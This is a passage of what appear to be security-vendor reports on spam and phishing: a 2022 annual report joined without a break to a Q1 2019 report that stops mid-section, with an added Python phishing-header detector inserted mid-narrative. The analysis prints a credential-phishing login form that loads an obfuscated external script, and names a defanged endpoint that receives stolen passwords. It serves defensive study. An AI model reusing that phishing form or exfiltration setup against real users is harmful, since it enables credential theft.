There were also spam mailings in which various companies offered to replace popular international software with Russian equivalents or solutions developed in third countries. In addition, there were spam propositions for intermediary services to open a company or bank account in neighboring countries, such as Armenia, as well as offers of assistance in accepting payments from foreign partners.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13153600/spam-phishing-report-2022-31.png>)

The shortage of printer paper in Russia in March and April 2022 spawned a wave of related ads offering paper at discount prices.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13153622/spam-phishing-report-2022-32.png>)

Spammers in 2022 also actively marketed their promotional mailing services as an alternative to advertising on platforms that had become unavailable, such as Instagram. In April alone, for example, we blocked around a million such mailings.

Against the backdrop of sanctions and the accompanying disruption of supply chains, there was an increase in spam offering goods and services from Chinese suppliers. In 2022, our filter blocked more than 3.5 million emails containing such offers, and their number kept growing, from around 700,000 in the first quarter to more than a million in the fourth.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13153708/spam-phishing-report-2022-33.png>)

### Spam with malicious attachments

Employees shifting to remote work during the pandemic and the associated growth of online communications spurred the active development of various kinds of phishing, both mass and targeted.
Attackers have become more active in imitating business correspondence, targeting not only HR specialists and accountants, as before the pandemic, but also employees in other departments. In 2022, we saw an evolution of malicious emails masquerading as business correspondence. Attackers actively used social engineering techniques in their emails, adding signatures with logos and information from specific organizations, creating a context appropriate to the company's profile, and applying business language. They also actively exploited the current news agenda and mentioned real employees of the company supposedly sending the emails. Spammers disguised their messages as internal company correspondence, business correspondence between different organizations, and even notifications from government agencies.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13153731/spam-phishing-report-2022-34.png>)

Masking malicious emails as business correspondence became a major trend in malicious spam in 2022. Attackers tried to convince the recipient that it was a legitimate email, such as a commercial offer, a request for the supply of equipment, or an invoice for the payment of goods. For example, throughout the year we encountered the following scheme. Attackers gained access to real business correspondence (most likely by stealing it from previously infected computers) and sent malicious files or links to all of its participants in reply to the previous email. This trick makes malicious emails harder to keep track of, and the victim is more likely to fall for it.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13153756/spam-phishing-report-2022-35.png>)

In most cases, either the [Qbot](<https://securelist.com/qakbot-technical-analysis/103931/>) Trojan or [Emotet](<https://securelist.com/emotet-modules-and-recent-attacks/>) was loaded when the malicious document was opened.
Both can be used to steal user data, collect information about the corporate network, and spread additional malware, such as ransomware. Qbot also allows attackers to gain access to emails and steal them for further attacks.

Mailings imitating notifications from various ministries and other government organizations have become more frequent on the Runet. The emails were often designed to reflect the specific activities of the organizations they were impersonating. The sender addresses copied the pattern of email addresses in the relevant agencies, and the malicious attachment was disguised as some kind of specialized document, such as "key points of the meeting". For example, malicious code was found in one of these mailings that exploited a vulnerability in the Equation Editor module, the formula editor in Microsoft Office.

The perpetrators did not ignore the news agenda either. In particular, malware was distributed under the guise of a call-up notice "as part of partial mobilization" or as a "new solution" to safeguard against possible internet threats "caused by hostile organizations".

In the second case, the program installed on the victim's computer was in fact a crypto-ransomware Trojan.

## Two-stage spear phishing using a known phish kit

In 2022, we saw an increase in spear (targeted) phishing attacks against businesses around the world. In addition to typical single-stage campaigns, there were attacks in several stages. In the first email, scammers posing as a potential client asked the victim to provide information about its products and services.
After the victim responds to this email, the attackers start the phishing attack proper.

Key facts:

 * Attackers use fake Dropbox pages created using a well-known phishing kit
 * The campaign targets the sales departments of manufacturers and suppliers of goods and services
 * Attackers use SMTP IP addresses and _From_ domains provided by Microsoft Corporation and Google LLC (Gmail)

### Statistics

The campaign began in April 2022, with malicious activity peaking in May, and ended by June.

_Number of emails related to the two-step targeted campaign detected by Kaspersky solutions ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13161029/01-en-spam-report-2022-diagrams.png>))_

### How a phishing campaign unfolds

Attackers send an email in the name of a real trade organization requesting more information about the victim company's products. The email text looks plausible and has no suspicious elements, such as phishing links or attachments. A sender address in a free domain, like gmail.com, may raise doubts. The email in the screenshot below is sent from an address in this domain, and the company name in the _From_ field differs from the name in the signature.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13153835/spam-phishing-report-2022-36.jpg>)

**_Example of the first email_**

It is worth noting that the use of free domains is not typical for spear phishing in the name of organizations, because such domains are rarely used in business. Most often in targeted attacks, attackers either use [spoofing of the legitimate domain](<https://securelist.com/email-spoofing-types/102703/>) of the organization they are pretending to be, or register domains similar to the original one. In addition, Google and Microsoft are pretty quick to block email addresses spotted sending spam.
This is the most likely reason why the attackers used different addresses in the _From_ header (where the email came from) and the _Reply-to_ header (where the reply goes when you click "Reply" in your email client). This means the victim responds to another address, which may be located in another free domain, such as outlook.com. The address in the _Reply-to_ header is not used for sending spam, and correspondence with it is initiated by the victim, so it is less likely to be blocked quickly.

After victims respond to the first email, the attackers send a new message asking them to go to a file-sharing site and view a PDF file with a completed order, which can be found via the link.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13153858/spam-phishing-report-2022-37.jpg>)

**_An email with a phishing link_**

By clicking the link, the user is taken to a fake site generated by a well-known phishing kit. It is a fairly simple tool that generates phishing pages to steal credentials for specific resources. Our solutions blocked fake WeTransfer and Dropbox pages created with this kit.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13153925/spam-phishing-report-2022-38.jpg>)

**_A fake WeTransfer page created using the same phish kit as the target campaign sites_**

In the phishing campaign described above, the phishing site mimics a Dropbox page with static file images and a download button.
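The first-stage email described above carries no link or attachment, so the signals a mail gateway can use are the ones the report names: an organization's display name over a free-mail From domain, a Reply-To in a different domain, and a signature naming a different company. The following is an added example (not code from the report or from Kaspersky) that checks those three signals with Python's standard `email` module on two constructed messages; the company names and addresses in them are made up. Note that SPF and DKIM are not a useful signal here, because the message really is sent from Gmail's infrastructure.

```python
"""Flag a first-stage spear-phishing enquiry by its header/signature mismatches.

Added example, not code from the report. The messages, company names and
addresses below are constructed; the free-mail list is a minimal sample.
"""
import email
import re
from email import policy
from email.utils import parseaddr

FREE_MAIL_DOMAINS = {"gmail.com", "outlook.com", "hotmail.com", "yahoo.com", "mail.ru"}
# Words that carry no identity of their own and should not count as a match.
GENERIC_NAME_TOKENS = {"ltd", "llc", "inc", "co", "gmbh", "company", "group", "the", "and"}
SIGNATURE_LINES = 6   # how many trailing non-empty lines count as the signature block


def _domain(addr: str) -> str:
    return addr.rpartition("@")[2].lower()


def _name_tokens(name: str) -> set:
    """Identifying tokens of a display name, e.g. {'northwind', 'trading'}."""
    return {t for t in re.findall(r"[a-z0-9]+", name.lower())
            if len(t) > 2 and t not in GENERIC_NAME_TOKENS}


def analyze(raw: bytes) -> list:
    """Return a list of human-readable findings; an empty list means nothing odd."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    from_name, from_addr = parseaddr(msg.get("From", ""))
    _, reply_addr = parseaddr(msg.get("Reply-To", ""))
    from_dom, reply_dom = _domain(from_addr), _domain(reply_addr)
    findings = []

    # 1. An organization presenting itself over a consumer mailbox.
    if from_name and from_dom in FREE_MAIL_DOMAINS:
        findings.append(f"organization display name over free-mail domain {from_dom}")

    # 2. Replies steered to a mailbox the sending address does not control.
    if reply_addr and reply_dom != from_dom:
        findings.append(f"Reply-To domain {reply_dom} differs from From domain {from_dom}")

    # 3. The signature names a company other than the one in the From header.
    body = msg.get_body(preferencelist=("plain",))
    text = body.get_content() if body else ""
    signature = " ".join([l for l in text.splitlines() if l.strip()][-SIGNATURE_LINES:]).lower()
    tokens = _name_tokens(from_name)
    if tokens and not any(tok in signature for tok in tokens):
        findings.append("From display name does not appear in the signature block")
    return findings


# Constructed first-stage enquiry in the style described above.
SUSPICIOUS_EMAIL = b"""\
From: Northwind Trading Ltd <northwind.purchasing2022@gmail.com>
Reply-To: nw.orders@outlook.com
To: sales@example.com
Subject: Request for quotation
Date: Tue, 10 May 2022 09:12:00 +0000
Content-Type: text/plain; charset=utf-8

Hello,

We are interested in your products. Could you send us your catalogue
and price list for bulk orders?

Best regards,
John Doe
Purchasing Manager
Contoso Supplies Inc.
"""

# Constructed benign enquiry: corporate domain, no Reply-To, consistent signature.
BENIGN_EMAIL = b"""\
From: Contoso Supplies <purchasing@contoso.example>
To: sales@example.com
Subject: Request for quotation
Date: Tue, 10 May 2022 10:00:00 +0000
Content-Type: text/plain; charset=utf-8

Hello,

Could you send us your current price list?

Best regards,
Jane Roe
Contoso Supplies Inc.
"""

if __name__ == "__main__":
    for label, raw in (("suspicious", SUSPICIOUS_EMAIL), ("benign", BENIGN_EMAIL)):
        print(label, "->", analyze(raw) or "no findings")
```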
After clicking any element of the interface, the user is taken to a fake Dropbox login page that requests valid corporate credentials.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13153950/spam-phishing-report-2022-39.png>)

**_A fake Dropbox page_**

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13154022/spam-phishing-report-2022-40.jpg>)

**_Login page with a phishing form_**

When victims attempt to log in, their usernames and passwords are sent to https://pbkvklqksxtdrfqkbkhszgkfjntdrf[.]herokuapp[.]com/send-mail.

```html
<form name="loginform">
  <div class="form-group">
    <label for="">Email Address</label>
    <input type="email" id="email" class="form-control" name="email" placeholder="email Address">
    <div class="email-error"></div>
  </div>
  <div class="form-group">
    <label for="">Password</label>
    <input type="password" id="password" class="form-control" name="password" placeholder="Password">
    <div class="password-error"></div>
  </div>
  <div class="form-group btn-area">
    <button class="download-btn" id="db" type="submit">Download</button>
  </div>
</form>
</div> <!-- closes a wrapper <div> that is not part of this excerpt -->
<!-- the form has no action attribute: the externally hosted script below handles the submission -->
<script src="https://firebasestorage.googleapis.com/v0/b/linktopage-c7fd6.appspot.com/o/obfuscated.js?alt=media&token=1bb73d28-53c8-4a1e-9b82-1e7d62f3826b"></script>
```

**_HTML representation of the phishing form_**

### Victims

We identified targets of this campaign around the world, including in the following countries: Russia, Bosnia and Herzegovina, Singapore, USA, Germany, Egypt, Thailand, Turkey, Serbia, Netherlands, Jordan, Iran, Kazakhstan, Portugal, and Malaysia.

## Statistics: spam

### Share of spam in mail traffic

In 2022, an average of 48.63% of emails worldwide were spam, representing a 3.07 p.p. increase on 2021.
Over the course of the year, however, the share of spam in global email traffic gradually declined, from 51.02% in the first quarter to 46.16% in the fourth.

_Share of spam in global email traffic, 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13161102/02-en-spam-report-2022-diagrams.png>))_

The most active month in terms of spam was February 2022, with junk traffic accounting for 52.78% of all email correspondence. June was in second place (51.66%). December was the calmest: only 45.20% of emails that month were spam.

On the Runet, the proportion of spam in email traffic is generally higher than worldwide. In 2022, an average of 52.44% of emails were junk mailings. At the same time, the same gradual shift in favor of legitimate correspondence can be seen. We saw the largest share of spam on the Runet in the first quarter, at 54.72% of all emails, and by the fourth quarter it had dropped to 49.20%.

_Proportion of spam in Runet email traffic, 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13161132/03-en-spam-report-2022-diagrams.png>))_

Even though the second quarter (53.96%) was quieter in terms of spam than the first, the most active month in the Russian segment of the internet was June (60.16%). Most likely, the share of spam in June, both in Russia and globally, was influenced by the surge in mailings with offers from Chinese factories that we observed in that month. The quietest month on the Runet was December (47.18%), the same as globally.

### Countries and territories — sources of spam

In 2022, the share of spam from Russia continued to grow, from 24.77% to 29.82%. Germany (5.19%) swapped places with mainland China (14.00%), whose share increased by 5.27 percentage points.
Third place is still held by the United States (10.71%).

_TOP 20 countries and territories — sources of spam, 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13161204/04-en-spam-report-2022-diagrams.png>))_

The Netherlands remained in fifth place (3.70%), although its share decreased compared to 2021. Sixth and seventh places went to Japan (3.25%) and Brazil (3.18%), whose shares rose by 0.89 and 3.77 p.p., respectively. Next come the UK (2.44%), France (2.27%) and India (1.82%).

### Malicious mail attachments

In 2022, our Mail Anti-Virus detected 166,187,118 malicious email attachments. That is an increase of 18 million on the previous year. This component was triggered most often in March, May, and June 2022.

_Number of Mail Anti-Virus hits, January — December 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13161240/05-en-spam-report-2022-diagrams.png>))_

The most common malicious email attachments in 2022, as in 2021, were [Agensla](<https://threats.kaspersky.com/en/threat/Trojan-PSW.MSIL.Agensla/>) Trojan stealers (7.14%), whose share decreased slightly. [Noon](<https://threats.kaspersky.com/en/threat/Trojan-Spy.MSIL.Noon/>) spyware (4.89%) moved up to second place, and [Badun](<https://threats.kaspersky.com/en/threat/Trojan.Win32.Badun/>) Trojans (4.61%), which spread as archived electronic documents, moved down to third place. The fourth most common malware were exploits for [CVE-2018-0802](<https://threats.kaspersky.com/en/threat/Exploit.MSOffice.CVE-2018-0802/>) (4.33%) in Microsoft Equation Editor. In 2022, attackers used them significantly more often than [CVE-2017-11882](<https://threats.kaspersky.com/en/threat/Exploit.MSOffice.CVE-2017-11882/>) exploits for the same component (1.80%).
The latter vulnerability was more widespread in 2021 and has now dropped to tenth place.

_TOP 10 malware families spread by email attachments in 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13161308/06-en-spam-report-2022-diagrams.png>))_

[ISO](<https://threats.kaspersky.com/en/threat/Trojan.Win32.ISO/>) Trojans (3.27%), sent in the form of disk images, moved up to number five, and the sixth most common was the [Guloader](<https://threats.kaspersky.com/en/threat/Trojan.Win32.Guloader/>) downloader family (2.65%), which delivers remotely controlled malware to victims' devices. They are closely followed by the [Badur](<https://threats.kaspersky.com/en/threat/Trojan.PDF.Badur/>) family (2.60%), PDF files containing links to web resources with questionable content, and in eighth place is the infamous [Emotet](<https://securelist.com/emotet-modules-and-recent-attacks/106290/>) botnet (2.52%). Law enforcement shut it down in early 2021, but by fall the attackers had restored the infrastructure, and they were actively distributing it in 2022. More recently, Emotet has been used to deliver other malware to victims' devices, particularly ransomware. The ninth most popular family was [Taskun](<https://threats.kaspersky.com/en/threat/Trojan.MSIL.Taskun/>) (2.10%), which creates malicious tasks in the task scheduler.

_TOP 10 types of malware spread by email attachments in 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13161339/07-en-spam-report-2022-diagrams.png>))_

The list of the most common malware sent via email usually corresponds to the list of families. As in 2021, attackers mostly distributed the same instances from the TOP 10 families.

### Countries and territories targeted by malicious mailings

Spain remains the leader in terms of blocked malicious attachments in 2022 (8.78%), a slight decrease compared to 2021 (9.32%).
The share of Russia (7.29%), on the other hand, increased slightly. Third place went to Mexico (6.73%) and fourth to Brazil (4.81%), whose share was virtually unchanged from the previous reporting period.

_TOP 20 countries and territories targeted by malicious mailings, 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13161409/08-en-spam-report-2022-diagrams.png>))_

Italy accounted for 4.76% of all malicious attachments blocked in 2022, followed by Vietnam (4.43%) and Turkey (4.31%). The share of Mail Anti-Virus detections on computers of users in Germany (3.85%) continued to decrease. The share of the United Arab Emirates (3.41%) also decreased slightly, dropping to ninth place, while Malaysia (2.98%) remained in tenth.

## Statistics: phishing

In 2022, the number of phishing attacks increased markedly. Our Anti-Phishing system prevented 507,851,735 attempts to follow a phishing link, roughly double the number in 2021.

### Map of phishing attacks

In 2022, the geography of phishing attacks changed dramatically. Attempts to click phishing links were most often blocked on devices in Vietnam (17.03%); in 2021, the country was not even among the TOP 10 most attacked countries and territories. Macau (13.88%), also absent from last year's ranking, is in second place, and Madagascar (12.04%), seventh in 2021, is in third. Besides Vietnam and Macau, Algeria (11.05%), Malawi (10.91%) and Morocco (10.43%) were new entrants at the top of the list of most attacked countries and territories. Ecuador (11.05%) moved up to fifth place, while Brunei (10.59%) dropped one place to seventh.
Brazil (10.57%) and Portugal (10.33%) moved from first and third place to eighth and tenth, respectively, and France, which was second in 2021, left the TOP 10.

TOP 10 countries and territories by share of attacked users:

**Country/territory** | **Share of attacked users**\*
---|---
Vietnam | 17.03%
Macau | 13.88%
Madagascar | 12.04%
Algeria | 11.05%
Ecuador | 11.05%
Malawi | 10.91%
Brunei | 10.59%
Brazil | 10.57%
Morocco | 10.43%
Portugal | 10.33%

**_\* Share of users encountering phishing out of the total number of Kaspersky users in that country/territory, 2022_**

### Top-level domains

As in previous years, the majority of phishing pages were hosted in the COM zone, but its share almost halved, from 31.55% to 17.69%. The XYZ zone remained in second place (8.79%), although its share also decreased. The third most popular zone among attackers was FUN (7.85%), which had not previously attracted their attention. The zone is associated with entertainment content, which is perhaps what drew fraudsters to it.

_Most frequent top-level domains for phishing pages in 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13161441/09-en-spam-report-2022-diagrams.png>))_

The ORG (3.89%) and TOP (1.80%) zones swapped positions relative to 2021 but still occupy fourth and fifth place. The remaining zones in the top ten most used by cybercriminals were RU (1.52%), COM.BR (1.13%), DE (0.98%), CO.UK (0.98%) and SE (0.92%).

### Organizations under phishing attacks

_The rating of organizations targeted by phishers is based on the triggering of the deterministic component of the Anti-Phishing system on user computers.
The component detects all pages with phishing content that the user has tried to open by following a link in an email message or on the web, as long as links to these pages are present in the Kaspersky database._

In 2022, pages impersonating delivery services accounted for the highest percentage of clicks on phishing links blocked by our solutions (27.38%). Online stores (15.56%), which were popular with attackers during the pandemic, occupied second place. Payment systems (10.39%) and banks (10.39%) ranked third and fourth, respectively.

_Distribution of organizations targeted by phishers, by category, 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13161508/10-en-spam-report-2022-diagrams.png>))_

The share of global internet portals (8.97%) almost halved, with almost as many phishing resources targeting users of smaller web services (8.24%). Social networks (6.83%), online games (2.84%), messengers (2.02%) and financial services (1.94%) round out the TOP 10 categories of sites of interest to criminals.

### Hijacking Telegram accounts

In 2022, our solutions stopped 378,496 phishing links aimed at hijacking Telegram accounts. Apart from a spike in phishing activity throughout June, when the number of blocked links exceeded 37,000, the first three quarters were relatively quiet. By the end of the year, however, the number of phishing attacks on the messenger's users rose dramatically: 44,700 in October, 83,100 in November and 125,000 in December.
This increase is most likely due to several large-scale Telegram account hijacking campaigns that we [observed in late 2022](<https://www.kaspersky.ru/blog/telegram-takeover-contest/34472/>) (article in Russian).

_Number of clicks on phishing links aimed at hijacking a Telegram account worldwide, and in Russia specifically, January–December 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13161540/11-en-spam-report-2022-diagrams.png>))_

Notably, the majority of these phishing attacks targeted users in Russia. In the first months of 2022 their share was roughly half of the worldwide total; from March onward, 70–90% of all attempts by Telegram users to follow phishing links came from Russian users.

### Phishing in messengers

_Statistics on messenger-based phishing are based on anonymized data from the Safe Messaging component of Kaspersky Internet Security for Android, voluntarily provided by users of this solution. Safe Messaging scans incoming messages and blocks attempts to follow any phishing or otherwise malicious links in them._

In 2022, our mobile solution blocked 360,185 attempts to click on phishing links from messengers. Of these, 82.71% came from WhatsApp, 14.12% from Telegram and another 3.17% from Viber.

_Distribution of links blocked by the Safe Messaging component, by messenger, 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13161612/12-en-spam-report-2022-diagrams.png>))_

Phishing activity on WhatsApp was down slightly compared to 2021. On average, the Safe Messaging component blocked 816 clicks on fraudulent links per day.
The first half of the year was the most turbulent, and by the third quarter phishing activity in the messenger had dropped sharply.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13154605/spam-phishing-report-2022-42.png>)

**_Dynamics of phishing activity on WhatsApp in 2022 (weekly number of detected links shown)_**

The largest number of phishing attempts on WhatsApp, approximately 76,000, was recorded in Brazil. Russia is in second place: over the year, the Safe Messaging component prevented 69,000 attempts there to go to fraudulent resources from the messenger.

_TOP 7 countries and territories where users most often clicked phishing links in WhatsApp ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13161647/13-en-spam-report-2022-diagrams.png>))_

Unlike on WhatsApp, the number of phishing attacks on Telegram almost tripled in 2022 compared to the previous reporting period. On average, our solutions blocked 140 attempts to follow phishing links in this messenger per day. Activity peaked at the end of June and beginning of July, when the number of blocked clicks exceeded 1,500 per week. Phishing activity on Telegram also increased sharply at the end of the year.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13154645/spam-phishing-report-2022-41.png>)

**_Dynamics of phishing activity on Telegram in 2022 (weekly number of detected links shown)_**

In Russia, we recorded the largest number (21,000) of attempts to click a link to fraudulent resources from Telegram.
Second place went to Brazil, where 3,800 clicks were blocked.

_TOP 7 countries and territories where users most frequently clicked phishing links from Telegram ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13161717/14-en-spam-report-2022-diagrams.png>))_

## Conclusion

Times of crisis create the preconditions for crime to flourish, including online. Scams promising compensation and payouts from government agencies, large corporations and banks are likely to remain popular among cybercriminals next year. The unpredictability of the currency market and the departure of individual companies from specific countries' markets will likely affect the number of scams associated with online shopping. At the same time, the COVID-19 topic, popular with cybercriminals in 2020 and 2021 but already waning in 2022, will finally cease to be relevant and will be replaced by more pressing global issues.

Recently, we have seen an increase in targeted phishing attacks in which scammers do not open with the phishing lure itself, but first exchange several introductory emails to build up active correspondence with the victim. This trend is likely to continue.
New tricks are also likely to emerge in the corporate sector in 2023, with attacks generating significant profits for attackers.

_Source: Securelist, "Spam and phishing in 2022", published 2023-02-16, <https://securelist.com/spam-phishing-scam-report-2022/108692/>. Vulnerabilities referenced: CVE-2017-11882, CVE-2018-0802._

## Spam and phishing in Q1 2019

## Quarterly highlights

### Valentine's Day

As per tradition, phishing timed to coincide with the lovey-dovey day was aimed at swindling valuable confidential information, such as bank card details, out of starry-eyed users.
The topics exploited by cybercriminals ranged from online flower shops to dating sites.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15142701/Spam-report-Q1-2019-1.png>)

But most often, users were invited to order gifts for loved ones or buy medications such as Viagra. Clicking/tapping the link in such messages resulted in the victim's payment details being sent to the cybercriminals.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15142735/Spam-report-Q1-2019-2.png>)

### New Apple products

Late March saw the unveiling of Apple's latest products, which fraudsters were quick to pounce on, as usual. In the run-up to the event, the number of attempts to redirect users to scam websites imitating official Apple services rose significantly.

_Growth in the number of attempts to redirect users to phishing Apple sites before the presentation ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/14143724/apple-en.png>))_

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15142839/Spam-report-Q1-2019-4.png>)

_Fake Apple ID login pages_

Scammers sent out phishing emails seemingly from Apple to try to fool recipients into following a link and entering their login credentials on a fake Apple ID login page.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143511/Spam-report-Q1-2019-5.png>)

### Fake technical support

Fake customer support emails are one of the most popular types of online fraud, and the number of such messages has grown significantly of late.
Links to fake technical support sites (accompanied by rave reviews) can be seen both on dedicated forums and on social networks.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15142930/Spam-report-Q1-2019-6.png>)

_Fake "Kaspersky Lab support service" accounts_

All the profiles of this kind that we detected in Q1 have one thing in common: they offer assistance with a particular company's products, promising specially trained, highly qualified staff supposedly ready and waiting to help. Needless to say, it is not free. Not only do users not have their issue resolved, they are likely to be defrauded as well.

### New Instagram "features"

Last year, we [wrote](<https://securelist.com/spam-and-phishing-in-q2-2018/87368/>) that phishers and other scammers had moved beyond mailing lists and into the realm of the popular social network Instagram. This trend continued, with fraudsters exploiting the service to the full: not only leaving links to phishing resources in comments, but also registering accounts, paying for advertising posts, and even enticing celebrities to distribute content.

Cybercriminal advertisers use the same methods to lure victims, promising products or services at what seems a great price.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143002/Spam-report-Q1-2019-7.png>)

As usual in such schemes, the "buyer" is asked for all sorts of information, from their name to bank details. It goes without saying that all the user gets is their private data compromised.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143034/Spam-report-Q1-2019-8.png>)

### Mailshot phishing

In Q1, we registered several phishing mailings in the form of automatic notifications seemingly on behalf of major services that manage legitimate mailing lists.
Scammers tried to pressure recipients into following the phishing links under the pretext of verifying an account or updating payment information. Sometimes fake domains with names similar to those of real services were used; other times, hacked sites redirected the victim to a fake authorization form.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143105/Spam-report-Q1-2019-9.png>)

### Financial spam through the ACH system

In Q1, we observed a large surge in spam mailings aimed at users of the Automated Clearing House (ACH), a US-based electronic payment system that processes vast quantities of consumer and small-business transactions. These mailings consisted of fake notifications about the status of transfers supposedly made by ordinary users or firms. Such messages contained both malicious attachments (archives, documents) and links to download files infected with malware.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143129/Spam-report-Q1-2019-10.png>)

### "Dream job" offers from spammers

In Q3 2018, we [registered spam messages](<https://securelist.com/spam-and-phishing-in-q3-2018/88686/>) containing "dream job" offers. This quarter, we logged another major mailing on the same topic: messages were sent supposedly on behalf of well-known companies sure to attract lots of potential applicants. Recipients were invited to register in the job search system for free by installing a special app on their computer to access the database. When trying to download the program from the "cloud service," the user was shown a pop-up window titled DDoS Protection and a message with a link pointing to the site of an online recruitment company (the names of several popular recruitment agencies were used in the mailing).
If the user followed it, a malicious DOC file containing Trojan.MSOffice.SAgent.gen was downloaded to their computer, which in turn downloaded Trojan-Banker.Win32.Gozi.bqr onto the victim's machine.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143159/Spam-report-Q1-2019-11.png>)

### Ransomware and cryptocurrency

As we expected, cybercriminal interest in cryptocurrency did not wane. Spammers continue to wring cryptocurrency payments out of users by means of "sextortion", a topic we [wrote about last year](<https://securelist.com/spam-and-phishing-in-2018/93453/>).

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143235/Spam-report-Q1-2019-12.png>)

In Q1 2019, we uncovered a rather unusual scam mailing scheme in which cybercriminals sent messages in the name of a CIA employee who allegedly had access to a case file on the recipient for possession and distribution of digital pornographic materials involving minors.

The fictitious employee, whose name varied from message to message, claimed to have found the victim's details in the case file (in reality harvested from social networks, online chats, forums, etc.). It was said to be part of an international operation to arrest more than 2,000 pedophilia suspects in 27 countries worldwide. However, the "employee" happened to know that the victim was a well-off individual with a reputation to protect, and demanded a payment of 10,000 dollars in bitcoin to keep it that way.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143314/Spam-report-Q1-2019-13.png>)

Playing on people's fear of private data being disclosed, the scammers employed the same tricks as last year, mentioning access to personal data, compromising pornographic materials, etc.
But this time, to make the message more convincing and intimidating, a CIA officer was used as the bogeyman.

### Malicious attacks on the corporate sector

In Q1, the [corporate sector of the Runet was hit by a malicious spam attack](<https://www.kaspersky.ru/blog/phishing-wave-shade/22251/>). The content imitated real business correspondence, and the messages themselves purported to come from partners of the victim company.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143345/Spam-report-Q1-2019-14.png>)

We also observed malicious mailings aimed at stealing the financial information of international companies by distributing fake messages in the name of a US company allegedly providing information services. Apart from the attachment, the message was completely empty. The lack of text was seemingly intended to prompt the victim to open the attached document, which contained Trojan.MSOffice.Alien.gen and in turn downloaded and installed Trojan-Banker.Win32.Trickster.gen on the computer.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143418/Spam-report-Q1-2019-15.png>)

### Attacks on the banking sector

Banks are firmly established as top phishing targets. Scammers try to make their fake messages as believable as possible by spoofing legitimate domains in the sender address, copying the layout of official emails, devising plausible pretexts, and so on. In Q1, phishers exploited high-profile events to persuade victims of the legitimacy of the message: for example, they inserted into the message body a phrase about the Christchurch terror attack. The attackers hoped that this, plus the name of a New Zealand bank as the sender, would add credibility to the message.
The email itself stated that the bank had introduced new security features, and that the recipient needed to update their account details to use them.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143441/Spam-report-Q1-2019-16.png>)

The link took the user to a phishing site mimicking the login page of the New Zealand bank in question. All data entered on the site was transferred to the cybercriminals when the Login button was clicked/tapped.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/14143603/Spam-report-Q1-2019-17.png>)

## Statistics: spam

### Proportion of spam in mail traffic

_Proportion of spam in global mail traffic, Q4 2018 – Q1 2019 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/14144003/spam-world-en.png>))_

In Q1 2019, the highest percentage of spam was recorded in March, at 56.33%. The average share of spam in global mail traffic came to 55.97%, almost identical (+0.07 p.p.) to Q4 2018.

_Proportion of spam in Runet mail traffic, Q4 2018 – Q1 2019 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/14143939/spam-russia-en.png>))_

Spam in the Russian segment of the Internet peaked in January (56.19%). The average value for the quarter was 55.48%, which is 2.01 p.p. higher than in Q4 2018.

### Sources of spam by country

_Sources of spam by country, Q1 2019 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/14143819/countries-source-en.png>))_

As is customary, the top spam-originating countries were China (15.82%) and the US (12.64%); the other Top 3 regular, Germany, was down to fifth place in Q1 (5.86%), ceding third place to Russia (6.98%) and allowing Brazil (6.95%) to sneak into fourth. In sixth place came France (4.26%), followed by Argentina (3.42%), Poland (3.36%) and India (2.58%).
The Top 10 is rounded off by Vietnam (2.18%).

### Spam email size

